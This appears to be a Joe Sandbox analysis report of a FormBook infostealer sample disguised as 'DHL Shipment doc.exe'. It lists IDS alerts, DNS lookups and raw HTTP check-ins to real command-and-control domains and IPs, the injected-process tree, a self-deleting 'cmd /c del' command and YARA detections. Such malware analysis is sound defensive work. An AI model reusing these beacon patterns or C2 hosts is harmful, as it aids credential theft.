.text | 0x2000 | 0x824a4 | 0x82600 | False | 0.861506022291 | data | 7.71171540744 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.sdata | 0x86000 | 0x1e8 | 0x200 | False | 0.861328125 | data | 6.62907763275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x88000 | 0x38b8 | 0x3a00 | False | 0.914466594828 | data | 7.69473198574 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x88130 | 0x31ed | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0x8b320 | 0x14 | data | |
RT_VERSION | 0x8b334 | 0x398 | data | |
RT_MANIFEST | 0x8b6cc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright Galaxy Man
Assembly Version | 2.0.0.0
InternalName | StaticArrayInitTypeSize40.exe
FileVersion | 5.0.0.0
CompanyName | Galaxy Man
LegalTrademarks |
Comments | GhostParty
ProductName | GhostParty
ProductVersion | 5.0.0.0
FileDescription | GhostParty
OriginalFilename | StaticArrayInitTypeSize40.exe
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/08/22-11:23:19.271128 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49825 | 80 | 192.168.2.4 | 35.213.137.92
02/08/22-11:23:19.271128 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49825 | 80 | 192.168.2.4 | 35.213.137.92
02/08/22-11:23:19.271128 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49825 | 80 | 192.168.2.4 | 35.213.137.92
02/08/22-11:23:24.536740 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.4 | 64.190.62.111
02/08/22-11:23:24.536740 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.4 | 64.190.62.111
02/08/22-11:23:24.536740 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.4 | 64.190.62.111
02/08/22-11:23:40.483266 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49845 | 80 | 192.168.2.4 | 37.140.192.43
02/08/22-11:23:40.483266 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49845 | 80 | 192.168.2.4 | 37.140.192.43
02/08/22-11:23:40.483266 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49845 | 80 | 192.168.2.4 | 37.140.192.43
02/08/22-11:23:40.545668 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49845 | 37.140.192.43 | 192.168.2.4
02/08/22-11:23:45.842049 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49846 | 34.102.136.180 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 8, 2022 11:23:08.995383024 CET | 192.168.2.4 | 8.8.8.8 | 0x1544 | Standard query (0) | www.bbgm4egda.xyz | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:19.058108091 CET | 192.168.2.4 | 8.8.8.8 | 0x1f51 | Standard query (0) | www.metronixmedical.com | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:24.490314960 CET | 192.168.2.4 | 8.8.8.8 | 0x13b7 | Standard query (0) | www.auctions.email | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:29.588390112 CET | 192.168.2.4 | 8.8.8.8 | 0x5218 | Standard query (0) | www.klopert77.com | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:34.621033907 CET | 192.168.2.4 | 8.8.8.8 | 0x8909 | Standard query (0) | www.solatopotato.com | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:40.352997065 CET | 192.168.2.4 | 8.8.8.8 | 0x7a9 | Standard query (0) | www.adwin-estate.com | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:45.679106951 CET | 192.168.2.4 | 8.8.8.8 | 0x500f | Standard query (0) | www.webfactory.agency | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 8, 2022 11:23:09.017996073 CET | 8.8.8.8 | 192.168.2.4 | 0x1544 | Name error (3) | www.bbgm4egda.xyz | none | none | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:19.081427097 CET | 8.8.8.8 | 192.168.2.4 | 0x1f51 | No error (0) | www.metronixmedical.com | | 35.213.137.92 | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:24.516465902 CET | 8.8.8.8 | 192.168.2.4 | 0x13b7 | No error (0) | www.auctions.email | | 64.190.62.111 | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:29.610807896 CET | 8.8.8.8 | 192.168.2.4 | 0x5218 | Name error (3) | www.klopert77.com | none | none | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:34.645180941 CET | 8.8.8.8 | 192.168.2.4 | 0x8909 | No error (0) | www.solatopotato.com | solatopotato.com | | CNAME (Canonical name) | IN (0x0001)
Feb 8, 2022 11:23:34.645180941 CET | 8.8.8.8 | 192.168.2.4 | 0x8909 | No error (0) | solatopotato.com | | 81.169.145.72 | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:40.418992996 CET | 8.8.8.8 | 192.168.2.4 | 0x7a9 | No error (0) | www.adwin-estate.com | | 37.140.192.43 | A (IP address) | IN (0x0001)
Feb 8, 2022 11:23:45.707781076 CET | 8.8.8.8 | 192.168.2.4 | 0x500f | No error (0) | www.webfactory.agency | webfactory.agency | | CNAME (Canonical name) | IN (0x0001)
Feb 8, 2022 11:23:45.707781076 CET | 8.8.8.8 | 192.168.2.4 | 0x500f | No error (0) | webfactory.agency | | 34.102.136.180 | A (IP address) | IN (0x0001)
                            • www.metronixmedical.com
                            • www.auctions.email
                            • www.solatopotato.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49825 | 35.213.137.92 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2022 11:23:19.271127939 CET | 9656 | OUT | GET /how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd HTTP/1.1
                            Host: www.metronixmedical.com
                            Connection: close
                            Data Raw: 00 00 00 00 00 00 00
                            Data Ascii:
Feb 8, 2022 11:23:19.453341007 CET | 9657 | IN | HTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 08 Feb 2022 10:23:19 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.metronixmedical.com/how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd
                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                            X-HTTPS-Enforce: 1
                            X-Proxy-Cache-Info: DT:1
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49839 | 64.190.62.111 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2022 11:23:24.536740065 CET | 9687 | OUT | GET /how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd HTTP/1.1
                            Host: www.auctions.email
                            Connection: close
                            Data Raw: 00 00 00 00 00 00 00
                            Data Ascii:
Feb 8, 2022 11:23:24.565557957 CET | 9689 | IN | HTTP/1.1 200 OK
                            date: Tue, 08 Feb 2022 10:23:24 GMT
                            content-type: text/html; charset=UTF-8
                            transfer-encoding: chunked
                            vary: Accept-Encoding
                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            pragma: no-cache
                            last-modified: Tue, 08 Feb 2022 10:23:24 GMT
                            x-cache-miss-from: parking-555544c6d6-v9qmr
                            server: NginX
                            connection: close
                            Data Ascii: 402<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>auctions.email</title> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"> <style> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } body { overflow: hidden; } </style></head><body><div id="partner"></div><script> document.write( '<script src="\/\/sedoparking.c
Feb 8, 2022 11:23:24.565593958 CET | 9689 | IN
                            Data Ascii: om/frmpark/auctions.email/sedopark/park.js">' + '<\/script>' );</script></body></html>
Feb 8, 2022 11:23:24.565610886 CET | 9689 | IN | Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49841 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2022 11:23:34.665507078 CET | 9699 | OUT | GET /how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd HTTP/1.1
                            Host: www.solatopotato.com
                            Connection: close
                            Data Raw: 00 00 00 00 00 00 00
                            Data Ascii:
Feb 8, 2022 11:23:35.477914095 CET | 9701 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 08 Feb 2022 10:23:34 GMT
                            Server: Apache/2.4.52 (Unix)
                            X-Powered-By: PHP/7.4.27
                            X-UA-Compatible: IE=edge
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <http://solpotato.com/wp-json/>; rel="https://api.w.org/"
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                            Transfer-Encoding: chunked
                            Data Ascii: 2000<!DOCTYPE html><html class="html" lang="de-DE"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Seite nicht gefunden &#8211; Solato Potato &#8211; Legendary Solana Potatoes</title><meta name='robots' content='max-image-preview:large' /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//solpotato.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Solato Potato - Legendary Solana Potatoes &raquo; Feed" href="http://solpotato.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Solato Potato - Legendary Solana Potatoes &raquo; Kommentar-Feed" href="http://solpotato.com/comments/feed/" /><link rel="alternate" type="application/rss+xml" title="Podcast Feed: (MP3 Feed)" href="http://solpotato.com/feed/mp3/" /><script>window._wpemojiSettings = {"baseUrl":"https
                            Feb 8, 2022 11:23:35.478153944 CET9713INData Raw: 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 6f 63 65 61 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62
                            Data Ascii: preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !i



                            Target ID:0
                            Start time:11:21:34
                            Start date:08/02/2022
                            Path:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\DHL Shipment doc.exe"
                            Imagebase:0xee0000
                            File size:550912 bytes
                            MD5 hash:4F0D2852D2AAD43EDDF9416661933701
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            Target ID:1
                            Start time:11:21:40
                            Start date:08/02/2022
                            Path:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Imagebase:0x3f0000
                            File size:550912 bytes
                            MD5 hash:4F0D2852D2AAD43EDDF9416661933701
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:3
                            Start time:11:21:42
                            Start date:08/02/2022
                            Path:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Imagebase:0x930000
                            File size:550912 bytes
                            MD5 hash:4F0D2852D2AAD43EDDF9416661933701
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:low

                            Target ID:6
                            Start time:11:21:46
                            Start date:08/02/2022
                            Path:C:\Windows\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Explorer.EXE
                            Imagebase:0x7ff6fee60000
                            File size:3933184 bytes
                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:high

                            Target ID:10
                            Start time:11:22:30
                            Start date:08/02/2022
                            Path:C:\Windows\SysWOW64\autoconv.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\SysWOW64\autoconv.exe
                            Imagebase:0x300000
                            File size:851968 bytes
                            MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:11
                            Start time:11:22:31
                            Start date:08/02/2022
                            Path:C:\Windows\SysWOW64\msiexec.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                            Imagebase:0xec0000
                            File size:59904 bytes
                            MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:high

                            Target ID:15
                            Start time:11:22:36
                            Start date:08/02/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/c del "C:\Users\user\Desktop\DHL Shipment doc.exe"
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:16
                            Start time:11:22:37
                            Start date:08/02/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high


                              Execution Graph

                              Execution Coverage:9.6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:116
                              Total number of Limit Nodes:13

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID: h1l
                              • API String ID: 0-2622859367
                              • Opcode ID: efc76fe3cc8b5165b6cdd6f22d4fbb4ee5cd8d1c5174aa2122a819954f78b436
                              • Instruction ID: 598795b35150b983b5e7aa130c938d14368bffc85801a9bc4ee5bca744f418d9
                              • Opcode Fuzzy Hash: efc76fe3cc8b5165b6cdd6f22d4fbb4ee5cd8d1c5174aa2122a819954f78b436
                              • Instruction Fuzzy Hash: 03F17F31A006598FCB15DF60C8807EAB3B2FF89304F21C599D90DAB291DB75AD86CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0190C5D0
                              • GetCurrentThread.KERNEL32 ref: 0190C60D
                              • GetCurrentProcess.KERNEL32 ref: 0190C64A
                              • GetCurrentThreadId.KERNEL32 ref: 0190C6A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: ea13c3fcbf1e165583734c1e5b6b3111f3cc648299ffa7fb5f8bff036bc4cd2f
                              • Instruction ID: b614d98db0c5396d9abea9cf2863d7c107e01ba1d3f566a235bf67ad808eded0
                              • Opcode Fuzzy Hash: ea13c3fcbf1e165583734c1e5b6b3111f3cc648299ffa7fb5f8bff036bc4cd2f
                              • Instruction Fuzzy Hash: 025187B49007498FDB14DFA9D988B9EBFF4EF89304F208599E419A7290C7346984CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0190C5D0
                              • GetCurrentThread.KERNEL32 ref: 0190C60D
                              • GetCurrentProcess.KERNEL32 ref: 0190C64A
                              • GetCurrentThreadId.KERNEL32 ref: 0190C6A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: c2a985206f9b6705340956e2a6a9fe43fbe7d25ae029f82f3fbdfeb72218d723
                              • Instruction ID: ea0b94d0a04b6fb0b9d1705d39b93a306b9a07d8efa5adad5513e264cdbed9b2
                              • Opcode Fuzzy Hash: c2a985206f9b6705340956e2a6a9fe43fbe7d25ae029f82f3fbdfeb72218d723
                              • Instruction Fuzzy Hash: 4B5166B49007498FDB14DFAAC988B9EBBF4EF89304F208559E019A7390C734A944CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0190A4CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: c7fbefe397d7e82a9b22f5c4bd92519d33c586392c42d8acbc3bba440ae63b21
                              • Instruction ID: 41abb5df297bf138d29b157b58d360f79f4cf2852ebfb40f17568235d3720d81
                              • Opcode Fuzzy Hash: c7fbefe397d7e82a9b22f5c4bd92519d33c586392c42d8acbc3bba440ae63b21
                              • Instruction Fuzzy Hash: 24714470A00B058FDB25DF2AD45075ABBF5FF88204F108A2DE54ADBA90DB75E905CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01905469
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 80c0ff20c747e523f47ae2c4d381cee27689326c077da8e0ce8375ddfbe5fdd0
                              • Instruction ID: 527db6f52accf6cf5d1542bd6d674391c1343d0618b940bf664022702d05b216
                              • Opcode Fuzzy Hash: 80c0ff20c747e523f47ae2c4d381cee27689326c077da8e0ce8375ddfbe5fdd0
                              • Instruction Fuzzy Hash: 314125B1D00618CFDB24DFA9C884BCDBBB1BF88304F25815AD508AB251DB756945CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01905469
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 08e2ca503832491e762e24f9b1f9b64e1b0af4f13160972199fe845d7e8e3235
                              • Instruction ID: 111d02826136912483edf1fddb1a1f51e64a6d04d1ec13b424bd52b9b303ae0d
                              • Opcode Fuzzy Hash: 08e2ca503832491e762e24f9b1f9b64e1b0af4f13160972199fe845d7e8e3235
                              • Instruction Fuzzy Hash: CE41F270D00718CFDB24DFA9C884BDEBBB5BF88304F21805AD508AB251DB755945CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 212 190c791-190c796 213 190c798-190c79c 212->213 214 190c79d-190c82c DuplicateHandle 212->214 213->214 215 190c835-190c852 214->215 216 190c82e-190c834 214->216 216->215
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190C81F
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 1f0b2b6368d35f4ae524cc39d5e4d23b71e64d9e3ecf034675f82a68034fa19f
                              • Instruction ID: 33fd5f9ccfb62a4b12b4575d09fc5897ef46ed85af8fcc72c184df35494fd056
